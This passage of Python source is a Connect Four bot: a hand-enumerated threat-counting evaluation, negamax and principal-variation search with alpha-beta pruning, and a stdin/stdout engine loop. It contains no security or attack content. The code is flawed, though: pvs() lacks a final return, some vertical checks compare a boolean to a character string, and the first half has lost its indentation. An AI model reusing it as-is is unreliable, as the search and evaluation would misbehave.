if (self.board[3][3] == self.board[2][4] == self.board[0][6] == '1' and self.board[1][5] == '0'): num_threats_first += 1
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == '2' and self.board[0][6] == '0'): num_threats_second += 1
if (self.board[3][3] == '0' and self.board[2][4] == self.board[1][5] == self.board[0][6] == '2'): num_threats_second += 1
if (self.board[3][3] == self.board[1][5] == self.board[0][6] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[3][3] == self.board[2][4] == self.board[0][6] == '2' and self.board[1][5] == '0'): num_threats_second += 1
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == '1' and self.board[2][5] == '0'): num_threats_first += 1
if (self.board[5][2] == '0' and self.board[4][3] == self.board[3][4] == self.board[2][5] == '1'): num_threats_first += 1
if (self.board[5][2] == self.board[3][4] == self.board[2][5] == '1' and self.board[4][3] == '0'): num_threats_first += 1
if (self.board[5][2] == self.board[4][3] == self.board[2][5] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == '2' and self.board[2][5] == '0'): num_threats_second += 1
if (self.board[5][2] == '0' and self.board[4][3] == self.board[3][4] == self.board[2][5] == '2'): num_threats_second += 1
if (self.board[5][2] == self.board[3][4] == self.board[2][5] == '2' and self.board[4][3] == '0'): num_threats_second += 1
if (self.board[5][2] == self.board[4][3] == self.board[2][5] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == '1' and self.board[1][6] == '0'): num_threats_first += 1
if (self.board[4][3] == '0' and self.board[3][4] == self.board[2][5] == self.board[1][6] == '1'): num_threats_first += 1
if (self.board[4][3] == self.board[2][5] == self.board[1][6] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[4][3] == self.board[3][4] == self.board[1][6] == '1' and self.board[2][5] == '0'): num_threats_first += 1
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == '2' and self.board[1][6] == '0'): num_threats_second += 1
if (self.board[4][3] == '0' and self.board[3][4] == self.board[2][5] == self.board[1][6] == '2'): num_threats_second += 1
if (self.board[4][3] == self.board[2][5] == self.board[1][6] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[4][3] == self.board[3][4] == self.board[1][6] == '2' and self.board[2][5] == '0'): num_threats_second += 1
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == '1' and self.board[2][6] == '0'): num_threats_first += 1
if (self.board[5][3] == '0' and self.board[4][4] == self.board[3][5] == self.board[2][6] == '1'): num_threats_first += 1
if (self.board[5][3] == self.board[3][5] == self.board[2][6] == '1' and self.board[4][4] == '0'): num_threats_first += 1
if (self.board[5][3] == self.board[4][4] == self.board[2][6] == '1' and self.board[3][5] == '0'): num_threats_first += 1
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == '2' and self.board[2][6] == '0'): num_threats_second += 1
if (self.board[5][3] == '0' and self.board[4][4] == self.board[3][5] == self.board[2][6] == '2'): num_threats_second += 1
if (self.board[5][3] == self.board[3][5] == self.board[2][6] == '2' and self.board[4][4] == '0'): num_threats_second += 1
if (self.board[5][3] == self.board[4][4] == self.board[2][6] == '2' and self.board[3][5] == '0'): num_threats_second += 1
# check for bottom_right -> top_left diagonal threats
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == '1' and self.board[5][3] == '0'): num_threats_first += 1
if (self.board[2][0] == '0' and self.board[3][1] == self.board[4][2] == self.board[5][3] == '1'): num_threats_first += 1
if (self.board[2][0] == self.board[4][2] == self.board[5][3] == '1' and self.board[3][1] == '0'): num_threats_first += 1
if (self.board[2][0] == self.board[3][1] == self.board[5][3] == '1' and self.board[4][2] == '0'): num_threats_first += 1
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == '2' and self.board[5][3] == '0'): num_threats_second += 1
if (self.board[2][0] == '0' and self.board[3][1] == self.board[4][2] == self.board[5][3] == '2'): num_threats_second += 1
if (self.board[2][0] == self.board[4][2] == self.board[5][3] == '2' and self.board[3][1] == '0'): num_threats_second += 1
if (self.board[2][0] == self.board[3][1] == self.board[5][3] == '2' and self.board[4][2] == '0'): num_threats_second += 1
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == '1' and self.board[4][3] == '0'): num_threats_first += 1
if (self.board[1][0] == '0' and self.board[2][1] == self.board[3][2] == self.board[4][3] == '1'): num_threats_first += 1
if (self.board[1][0] == self.board[3][2] == self.board[4][3] == '1' and self.board[2][1] == '0'): num_threats_first += 1
if (self.board[1][0] == self.board[2][1] == self.board[4][3] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == '2' and self.board[4][3] == '0'): num_threats_second += 1
if (self.board[1][0] == '0' and self.board[2][1] == self.board[3][2] == self.board[4][3] == '2'): num_threats_second += 1
if (self.board[1][0] == self.board[3][2] == self.board[4][3] == '2' and self.board[2][1] == '0'): num_threats_second += 1
if (self.board[1][0] == self.board[2][1] == self.board[4][3] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == '1' and self.board[5][4] == '0'): num_threats_first += 1
if (self.board[2][1] == '0' and self.board[3][2] == self.board[4][3] == self.board[5][4] == '1'): num_threats_first += 1
if (self.board[2][1] == self.board[4][3] == self.board[5][4] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[2][1] == self.board[3][2] == self.board[5][4] == '1' and self.board[4][3] == '0'): num_threats_first += 1
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == '2' and self.board[5][4] == '0'): num_threats_second += 1
if (self.board[2][1] == '0' and self.board[3][2] == self.board[4][3] == self.board[5][4] == '2'): num_threats_second += 1
if (self.board[2][1] == self.board[4][3] == self.board[5][4] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[2][1] == self.board[3][2] == self.board[5][4] == '2' and self.board[4][3] == '0'): num_threats_second += 1
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[0][0] == '0' and self.board[1][1] == self.board[2][2] == self.board[3][3] == '1'): num_threats_first += 1
if (self.board[0][0] == self.board[2][2] == self.board[3][3] == '1' and self.board[1][1] == '0'): num_threats_first += 1
if (self.board[0][0] == self.board[1][1] == self.board[3][3] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[0][0] == '0' and self.board[1][1] == self.board[2][2] == self.board[3][3] == '2'): num_threats_second += 1
if (self.board[0][0] == self.board[2][2] == self.board[3][3] == '2' and self.board[1][1] == '0'): num_threats_second += 1
if (self.board[0][0] == self.board[1][1] == self.board[3][3] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == '1' and self.board[4][4] == '0'): num_threats_first += 1
if (self.board[1][1] == '0' and self.board[2][2] == self.board[3][3] == self.board[4][4] == '1'): num_threats_first += 1
if (self.board[1][1] == self.board[3][3] == self.board[4][4] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[1][1] == self.board[2][2] == self.board[4][4] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == '2' and self.board[4][4] == '0'): num_threats_second += 1
if (self.board[1][1] == '0' and self.board[2][2] == self.board[3][3] == self.board[4][4] == '2'): num_threats_second += 1
if (self.board[1][1] == self.board[3][3] == self.board[4][4] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[1][1] == self.board[2][2] == self.board[4][4] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == '1' and self.board[5][5] == '0'): num_threats_first += 1
if (self.board[2][2] == '0' and self.board[3][3] == self.board[4][4] == self.board[5][5] == '1'): num_threats_first += 1
if (self.board[2][2] == self.board[4][4] == self.board[5][5] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[2][2] == self.board[3][3] == self.board[5][5] == '1' and self.board[4][4] == '0'): num_threats_first += 1
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == '2' and self.board[5][5] == '0'): num_threats_second += 1
if (self.board[2][2] == '0' and self.board[3][3] == self.board[4][4] == self.board[5][5] == '2'): num_threats_second += 1
if (self.board[2][2] == self.board[4][4] == self.board[5][5] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[2][2] == self.board[3][3] == self.board[5][5] == '2' and self.board[4][4] == '0'): num_threats_second += 1
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[0][1] == '0' and self.board[1][2] == self.board[2][3] == self.board[3][4] == '1'): num_threats_first += 1
if (self.board[0][1] == self.board[2][3] == self.board[3][4] == '1' and self.board[1][2] == '0'): num_threats_first += 1
if (self.board[0][1] == self.board[1][2] == self.board[3][4] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[0][1] == '0' and self.board[1][2] == self.board[2][3] == self.board[3][4] == '2'): num_threats_second += 1
if (self.board[0][1] == self.board[2][3] == self.board[3][4] == '2' and self.board[1][2] == '0'): num_threats_second += 1
if (self.board[0][1] == self.board[1][2] == self.board[3][4] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == '1' and self.board[4][5] == '0'): num_threats_first += 1
if (self.board[1][2] == '0' and self.board[2][3] == self.board[3][4] == self.board[4][5] == '1'): num_threats_first += 1
if (self.board[1][2] == self.board[3][4] == self.board[4][5] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[1][2] == self.board[2][3] == self.board[4][5] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == '2' and self.board[4][5] == '0'): num_threats_second += 1
if (self.board[1][2] == '0' and self.board[2][3] == self.board[3][4] == self.board[4][5] == '2'): num_threats_second += 1
if (self.board[1][2] == self.board[3][4] == self.board[4][5] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[1][2] == self.board[2][3] == self.board[4][5] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == '1' and self.board[5][6] == '0'): num_threats_first += 1
if (self.board[2][3] == '0' and self.board[3][4] == self.board[4][5] == self.board[5][6] == '1'): num_threats_first += 1
if (self.board[2][3] == self.board[4][5] == self.board[5][6] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[2][3] == self.board[3][4] == self.board[5][6] == '1' and self.board[4][5] == '0'): num_threats_first += 1
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == '2' and self.board[5][6] == '0'): num_threats_second += 1
if (self.board[2][3] == '0' and self.board[3][4] == self.board[4][5] == self.board[5][6] == '2'): num_threats_second += 1
if (self.board[2][3] == self.board[4][5] == self.board[5][6] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[2][3] == self.board[3][4] == self.board[5][6] == '2' and self.board[4][5] == '0'): num_threats_second += 1
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == '1' and self.board[3][5] == '0'): num_threats_first += 1
if (self.board[0][2] == '0' and self.board[1][3] == self.board[2][4] == self.board[3][5] == '1'): num_threats_first += 1
if (self.board[0][2] == self.board[2][4] == self.board[3][5] == '1' and self.board[1][3] == '0'): num_threats_first += 1
if (self.board[0][2] == self.board[1][3] == self.board[3][5] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == '2' and self.board[3][5] == '0'): num_threats_second += 1
if (self.board[0][2] == '0' and self.board[1][3] == self.board[2][4] == self.board[3][5] == '2'): num_threats_second += 1
if (self.board[0][2] == self.board[2][4] == self.board[3][5] == '2' and self.board[1][3] == '0'): num_threats_second += 1
if (self.board[0][2] == self.board[1][3] == self.board[3][5] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == '1' and self.board[4][6] == '0'): num_threats_first += 1
if (self.board[1][3] == '0' and self.board[2][4] == self.board[3][5] == self.board[4][6] == '1'): num_threats_first += 1
if (self.board[1][3] == self.board[3][5] == self.board[4][6] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[1][3] == self.board[2][4] == self.board[4][6] == '1' and self.board[3][5] == '0'): num_threats_first += 1
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == '2' and self.board[4][6] == '0'): num_threats_second += 1
if (self.board[1][3] == '0' and self.board[2][4] == self.board[3][5] == self.board[4][6] == '2'): num_threats_second += 1
if (self.board[1][3] == self.board[3][5] == self.board[4][6] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[1][3] == self.board[2][4] == self.board[4][6] == '2' and self.board[3][5] == '0'): num_threats_second += 1
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == '1' and self.board[3][6] == '0'): num_threats_first += 1
if (self.board[0][3] == '0' and self.board[1][4] == self.board[2][5] == self.board[3][6] == '1'): num_threats_first += 1
if (self.board[0][3] == self.board[2][5] == self.board[3][6] == '1' and self.board[1][4] == '0'): num_threats_first += 1
if (self.board[0][3] == self.board[1][4] == self.board[3][6] == '1' and self.board[2][5] == '0'): num_threats_first += 1
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == '2' and self.board[3][6] == '0'): num_threats_second += 1
if (self.board[0][3] == '0' and self.board[1][4] == self.board[2][5] == self.board[3][6] == '2'): num_threats_second += 1
if (self.board[0][3] == self.board[2][5] == self.board[3][6] == '2' and self.board[1][4] == '0'): num_threats_second += 1
if (self.board[0][3] == self.board[1][4] == self.board[3][6] == '2' and self.board[2][5] == '0'): num_threats_second += 1
for i in range(6):#check for horizontal threats
if (self.board[i][1] == self.board[i][2] == self.board[i][3] == '1'):
if (self.board[i][0] == '0'): num_threats_first += 1
if (self.board[i][4] == '0'): num_threats_first += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][4] == '1'):
if (self.board[i][1] == '0'): num_threats_first += 1
if (self.board[i][5] == '0'): num_threats_first += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][5] == '1'):
if (self.board[i][2] == '0'): num_threats_first += 1
if (self.board[i][6] == '0'): num_threats_first += 1
if (self.board[i][3] == '0'):
if (self.board[i][4] == self.board[i][5] == self.board[i][6] == '1'): num_threats_first += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][2] == '1'): num_threats_first += 1
if (self.board[i][0] == self.board[i][2] == self.board[i][3] == '1' and self.board[i][1] == '0'): num_threats_first += 1#*_** pattern
if (self.board[i][1] == self.board[i][3] == self.board[i][4] == '1' and self.board[i][2] == '0'): num_threats_first += 1
if (self.board[i][2] == self.board[i][4] == self.board[i][5] == '1' and self.board[i][3] == '0'): num_threats_first += 1
if (self.board[i][3] == self.board[i][5] == self.board[i][6] == '1' and self.board[i][4] == '0'): num_threats_first += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][3] == '1' and self.board[i][2] == '0'): num_threats_first += 1#**_* pattern
if (self.board[i][1] == self.board[i][2] == self.board[i][4] == '1' and self.board[i][3] == '0'): num_threats_first += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][5] == '1' and self.board[i][4] == '0'): num_threats_first += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][6] == '1' and self.board[i][5] == '0'): num_threats_first += 1
if (self.board[i][1] == self.board[i][2] == self.board[i][3] == '2'):
if (self.board[i][0] == '0'): num_threats_second += 1
if (self.board[i][4] == '0'): num_threats_second += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][4] == '2'):
if (self.board[i][1] == '0'): num_threats_second += 1
if (self.board[i][5] == '0'): num_threats_second += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][5] == '2'):
if (self.board[i][2] == '0'): num_threats_second += 1
if (self.board[i][6] == '0'): num_threats_second += 1
if (self.board[i][3] == '0'):
if (self.board[i][4] == self.board[i][5] == self.board[i][6] == '2'): num_threats_second += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][2] == '2'): num_threats_second += 1
if (self.board[i][0] == self.board[i][2] == self.board[i][3] == '2' and self.board[i][1] == '0'): num_threats_second += 1 # *_** pattern
if (self.board[i][1] == self.board[i][3] == self.board[i][4] == '2' and self.board[i][2] == '0'): num_threats_second += 1
if (self.board[i][2] == self.board[i][4] == self.board[i][5] == '2' and self.board[i][3] == '0'): num_threats_second += 1
if (self.board[i][3] == self.board[i][5] == self.board[i][6] == '2' and self.board[i][4] == '0'): num_threats_second += 1
if (self.board[i][0] == self.board[i][1] == self.board[i][3] == '2' and self.board[i][2] == '0'): num_threats_second += 1 # **_* pattern
if (self.board[i][1] == self.board[i][2] == self.board[i][4] == '2' and self.board[i][3] == '0'): num_threats_second += 1
if (self.board[i][2] == self.board[i][3] == self.board[i][5] == '2' and self.board[i][4] == '0'): num_threats_second += 1
if (self.board[i][3] == self.board[i][4] == self.board[i][6] == '2' and self.board[i][5] == '0'): num_threats_second += 1
for i in range(7):#check for vertical threats
if (self.board[0][i] == self.board[1][i] == self.board[2][i] == '1' and self.board[3][i] == '0'): num_threats_first += 1
if (self.board[1][i] == self.board[2][i] == self.board[3][i]) == '1':
if (self.board[0][i] == '0'): num_threats_first += 1
if (self.board[4][i] == '0'): num_threats_first += 1
if (self.board[2][i] == self.board[3][i] == self.board[4][i]) == '1':
if (self.board[1][i] == '0'): num_threats_first += 1
if (self.board[5][i] == '0'): num_threats_first += 1
if (self.board[3][i] == self.board[4][i] == self.board[5][i] == '1' and self.board[2][i] == '0'): num_threats_first += 1
if (self.board[0][i] == self.board[2][i] == self.board[3][i] == '1' and self.board[1][i] == '0'): num_threats_first += 1
if (self.board[1][i] == self.board[3][i] == self.board[4][i] == '1' and self.board[2][i] == '0'): num_threats_first += 1
if (self.board[2][i] == self.board[4][i] == self.board[5][i] == '1' and self.board[3][i] == '0'): num_threats_first += 1
if (self.board[0][i] == self.board[1][i] == self.board[3][i] == '1' and self.board[2][i] == '0'): num_threats_first += 1
if (self.board[1][i] == self.board[2][i] == self.board[4][i] == '1' and self.board[3][i] == '0'): num_threats_first += 1
if (self.board[2][i] == self.board[3][i] == self.board[5][i] == '1' and self.board[4][i] == '0'): num_threats_first += 1
if (self.board[0][i] == self.board[1][i] == self.board[2][i] == '2' and self.board[3][i] == '0'): num_threats_second += 1
if (self.board[1][i] == self.board[2][i] == self.board[3][i]) == '2':
if (self.board[0][i] == '0'): num_threats_second += 1
if (self.board[4][i] == '0'): num_threats_second += 1
if (self.board[2][i] == self.board[3][i] == self.board[4][i]) == '2':
if (self.board[1][i] == '0'): num_threats_second += 1
if (self.board[5][i] == '0'): num_threats_second += 1
if (self.board[3][i] == self.board[4][i] == self.board[5][i] == '2' and self.board[2][i] == '0'): num_threats_second += 1
if (self.board[0][i] == self.board[2][i] == self.board[3][i] == '2' and self.board[1][i] == '0'): num_threats_second += 1
if (self.board[1][i] == self.board[3][i] == self.board[4][i] == '2' and self.board[2][i] == '0'): num_threats_second += 1
if (self.board[2][i] == self.board[4][i] == self.board[5][i] == '2' and self.board[3][i] == '0'): num_threats_second += 1
if (self.board[0][i] == self.board[1][i] == self.board[3][i] == '2' and self.board[2][i] == '0'): num_threats_second += 1
if (self.board[1][i] == self.board[2][i] == self.board[4][i] == '2' and self.board[3][i] == '0'): num_threats_second += 1
if (self.board[2][i] == self.board[3][i] == self.board[5][i] == '2' and self.board[4][i] == '0'): num_threats_second += 1
# print("returned score from valid moves: {}".format((my_count - opp_count)))
# print("threats_first = {}, threats_second = {}.".format(num_threats_first, num_threats_second))
return l_color * (num_threats_first - num_threats_second)
def is_terminal_node(self, l_color):
    """Return the terminal score of the current position, or 0 if not terminal.

    Scans every four-in-a-row window on the 6x7 board (horizontal, vertical
    and both diagonals).  A connect-four for player '1' scores
    ``l_color * SMALL_INIFINITY``; one for player '2' scores the negation.
    The sign convention matches the negamax callers, which flip ``l_color``
    each ply.

    :param l_color: +1 or -1, sign multiplier for the returned score.
    :returns: ``l_color * SMALL_INIFINITY`` ('1' wins), its negation
        ('2' wins), or 0 when no four-in-a-row exists.
    """
    terminal_val = l_color * SMALL_INIFINITY
    board = self.board
    # Each entry is (row_step, col_step, start_rows, start_cols); a window is
    # the four cells starting at (i, j) stepping by the direction.  The
    # ranges cover exactly the same 69 windows the original enumerated:
    # 6*4 horizontal, 3*7 vertical, and 12 windows per diagonal direction.
    directions = (
        (0, 1, range(6), range(4)),      # horizontal
        (1, 0, range(3), range(7)),      # vertical
        (1, 1, range(3), range(4)),      # top-left -> bottom-right diagonal
        (-1, 1, range(3, 6), range(4)),  # bottom-left -> top-right diagonal
    )
    for di, dj, rows, cols in directions:
        for i in rows:
            for j in cols:
                window = (board[i][j],
                          board[i + di][j + dj],
                          board[i + 2 * di][j + 2 * dj],
                          board[i + 3 * di][j + 3 * dj])
                if window == ('1', '1', '1', '1'): return terminal_val
                if window == ('2', '2', '2', '2'): return -terminal_val
    return 0  # returns 0 in case the node is not terminal
def make_move_on_board(self, move, l_color):
    """Drop a tile for *l_color* into column *move* and return the landing row.

    The column is scanned bottom-up for the first empty ('0') cell, which is
    overwritten with '1' (when ``l_color == 1``) or '2' (otherwise).

    NOTE(review): a completely full column falls through and returns None —
    callers are expected to validate the move against get_valid_moves() first.
    """
    tile = "1" if l_color == 1 else "2"
    column = int(move)
    for row in range(5, -1, -1):
        if self.board[row][column] == "0":
            self.board[row][column] = tile
            return row
def unmake_move(self, row, columm):
    """Clear the cell at (row, columm) back to '0', undoing a trial move.

    Used by the search routines to restore the board after exploring a move.
    """
    self.board[row][columm] = "0"
def get_valid_moves(self):
    """Return the playable columns as a list of strings ('0'..'6').

    A column is playable while its top cell (row 0) is still empty; columns
    are reported in left-to-right order.
    """
    return [str(col) for col in range(7) if self.board[0][col] == '0']
def negamax(self, l_color, depth, alpha, beta):
    """Fail-hard negamax search with alpha-beta pruning.

    :param l_color: +1 or -1, the side to move (sign multiplier for scores).
    :param depth: remaining plies to search; 0 triggers static evaluation.
    :param alpha: lower bound of the search window.
    :param beta: upper bound of the search window.
    :returns: a score clamped to [alpha, beta] from the mover's point of view.
    """
    #print("entered negamax with color = {}, depth = {}, alpha = {}, beta = {}".format(color, depth, alpha, beta))
    # NOTE(review): the depth-0 static evaluation runs before the terminal
    # check, so a decided position at exactly depth 0 is scored by
    # eval_board rather than as a win/loss — confirm this is intended.
    if (depth == 0): return self.eval_board(l_color)
    is_terminal = self.is_terminal_node(l_color)
    if (is_terminal != 0):
        #print("IS TERMINAL!")
        return is_terminal
    possible_moves = self.get_valid_moves()
    #print("possible moves: {}".format(possible_moves))
    #random.shuffle(possible_moves)
    #possible_moves = self.order_moves(possible_moves, l_color)
    #print("possible moves: {}".format(possible_moves))
    if (len(possible_moves) == 0):
        # Full board with no winner: fall back to the static evaluation.
        #print("__________________________________EMPTY POSSIBLE MOVES________________________________________")
        return self.eval_board(l_color)
    for current_move in possible_moves:
        row = self.make_move_on_board(current_move, l_color)
        #print("made move {}".format(current_move))
        #print("current board: {}".format(self.board))
        # Recurse with flipped sign and a negated, swapped window.
        new_score = -self.negamax(-l_color, depth - 1, -beta, -alpha)
        #print("returned with value {}".format(new_score))
        self.unmake_move(row, int(current_move))
        if (new_score >= beta): return beta  # fail-hard beta cutoff
        if (new_score > alpha): alpha = new_score
    return alpha
def root_search_negamax(self, l_color, depth, alpha, beta):
    """Top-level negamax: search every legal move and return the best column.

    Unlike negamax(), this returns the *move* (a column-number string), not
    a score.  When the board is completely full it falls back to returning
    the static evaluation (legacy behaviour kept for caller compatibility).

    :param l_color: +1 or -1, the side the engine is choosing a move for.
    :param depth: search depth in plies.
    :param alpha: initial lower bound (ALPHA_0 at the outermost call).
    :param beta: initial upper bound (BETA_0 at the outermost call).
    :returns: the best move as a column-number string.
    """
    possible_moves = self.get_valid_moves()
    if (len(possible_moves) == 0):
        return self.eval_board(l_color)
    # Default to the first legal move so a playable move is always returned:
    # the original initialised best_move = "" and could return it when no
    # line improved on the initial alpha, crashing int(best_move) in the
    # caller.  (The unused best_score local was dropped as well.)
    best_move = possible_moves[0]
    for current_move in possible_moves:
        row = self.make_move_on_board(current_move, l_color)
        new_score = -self.negamax(-l_color, depth - 1, -beta, -alpha)
        self.unmake_move(row, int(current_move))
        if (new_score > alpha):
            alpha = new_score
            best_move = current_move
        if (new_score >= beta):
            break  # fail-high: remaining moves cannot matter at the root
    return best_move
def pvs(self, l_color, depth, alpha, beta):
    """Principal-variation search (negamax with null-window re-searches).

    Same interface and sign convention as negamax(): returns a fail-hard
    score within [alpha, beta] from the mover's point of view.  Once one
    move has raised alpha (the candidate principal variation), the
    remaining moves are probed with a zero-width window and fully
    re-searched only when the probe suggests a score inside (alpha, beta).
    """
    #print("entered pvs with color = {}, depth = {}, alpha = {}, beta = {}".format(l_color, depth, alpha, beta))
    # NOTE(review): as in negamax(), the depth-0 evaluation runs before the
    # terminal check — confirm this ordering is intended.
    if (depth == 0): return self.eval_board(l_color)
    is_terminal = self.is_terminal_node(l_color)
    if (is_terminal != 0):
        # print("IS TERMINAL!")
        return is_terminal
    possible_moves = self.get_valid_moves()
    #print("possible moves: {}".format(possible_moves))
    #random.shuffle(possible_moves)
    #possible_moves = self.order_moves(possible_moves, l_color)
    # print("possible moves: {}".format(possible_moves))
    if (len(possible_moves) == 0):
        # Full board with no winner: static evaluation.
        #print("__________________________________EMPTY POSSIBLE MOVES________________________________________")
        return self.eval_board(l_color)
    found_pv = False
    for current_move in possible_moves:
        row = self.make_move_on_board(current_move, l_color)
        #print("made move {}".format(current_move))
        # print("current board: {}".format(self.board))
        if (found_pv):
            # Null-window probe around alpha.
            new_score = -self.pvs(-l_color, depth - 1, -alpha - 1, -alpha)
            if (new_score > alpha and new_score < beta):
                # Probe landed inside the window: re-search at full width.
                new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
        else: new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
        #print("returned with value {}".format(new_score))
        self.unmake_move(row, int(current_move))
        if (new_score >= beta): return beta  # fail-hard beta cutoff
        if (new_score > alpha):
            alpha = new_score
        found_pv = True
def root_search_pvs(self, l_color, depth, alpha, beta):
    """Top-level principal-variation search; returns the best column string.

    Root moves are pre-ordered best-first by static evaluation to improve
    cutoffs.  After the first move that raises alpha, later moves are
    probed with a null window and re-searched at full width only on a
    promising probe score.  Falls back to the static evaluation when the
    board is full (legacy behaviour kept for caller compatibility).
    """
    possible_moves = self.get_valid_moves()
    if (len(possible_moves) == 0):
        return self.eval_board(l_color)
    possible_moves = self.order_moves(possible_moves, l_color)
    # Default to the first (best-ordered) move so a playable move is always
    # returned: the original initialised best_move = "" and could return it
    # when no score beat the initial alpha, crashing int(best_move) in the
    # caller.  (The unused best_score local was dropped as well.)
    best_move = possible_moves[0]
    found_pv = False
    for current_move in possible_moves:
        row = self.make_move_on_board(current_move, l_color)
        if (found_pv):
            # Null-window probe; re-search with the full window only when
            # the probe lands strictly inside (alpha, beta).
            new_score = -self.pvs(-l_color, depth - 1, -alpha - 1, -alpha)
            if (new_score > alpha and new_score < beta):
                new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
        else:
            new_score = -self.pvs(-l_color, depth - 1, -beta, -alpha)
        self.unmake_move(row, int(current_move))
        if (new_score > alpha):
            alpha = new_score
            best_move = current_move
            found_pv = True
        if (new_score >= beta):
            break  # fail-high cutoff at the root
    return best_move
def order_moves(self, valid_moves, l_color):
    """Order *valid_moves* best-first by static evaluation.

    Each candidate move is played on the board, scored with eval_board,
    and undone; moves are then sorted by that score, highest first, to
    improve alpha-beta cutoffs in the search.  The sort is stable, so
    equally-scored moves keep their original relative order.

    :param valid_moves: iterable of column-number strings.
    :param l_color: +1 or -1, the side the moves are evaluated for.
    :returns: list of the same moves, best-scoring first.
    """
    # (The original also kept an unused valid_moves_ordered local and a
    # commented-out manual copy loop; both removed.)
    scored = []
    for curr_move in valid_moves:
        row = self.make_move_on_board(curr_move, l_color)
        scored.append((self.eval_board(l_color), curr_move))
        self.unmake_move(row, int(curr_move))
    scored.sort(key=lambda pair: pair[0], reverse=True)
    return [move for _, move in scored]
def send_move(self, move):
    """Report a move to the game engine.

    Writes a ``place_disc <column>`` line to stdout and flushes
    immediately so the engine sees it without buffering delay.
    """
    command = "place_disc {}".format(move) + "\n"
    sys.stdout.write(command)
    sys.stdout.flush()
def get_random_move(self):
    """Return a uniformly random column index in [0, 6]."""
    # randrange(0, 7) is exactly equivalent to randint(0, 6), including the
    # values drawn from the module-level random state.
    return random.randrange(0, 7)
def run(self):
    """Main loop for the engine protocol: read commands from stdin and react.

    Dispatches ``settings``, ``update`` and ``action`` messages.  On
    ``action`` the bot searches for a move, applies it to its own board,
    and reports it to the engine via send_move().

    Fixes applied: the method now operates on ``self`` instead of the
    module-level ``my_bot`` global; the stray ``print("hi")`` debug line
    was removed (it polluted the stdout protocol stream); and the move is
    applied with make_move_on_board(move, color) — the visible make_move()
    takes no arguments beyond self, so the original call was a TypeError.
    """
    while not sys.stdin.closed:
        m_input = sys.stdin.readline().strip()
        if not m_input:
            continue
        msg = m_input.split(" ")
        if msg[0] == "settings":
            self.store_settings(msg)
        elif msg[0] == "update":
            self.update(msg)
        elif msg[0] == "action":
            computer_move = self.root_search_negamax(self.color, MINIMAX_DEPTH, ALPHA_0, BETA_0)
            # Apply the move locally before reporting it to the engine.
            self.make_move_on_board(computer_move, self.color)
            self.send_move(computer_move)
def draw_board(self):
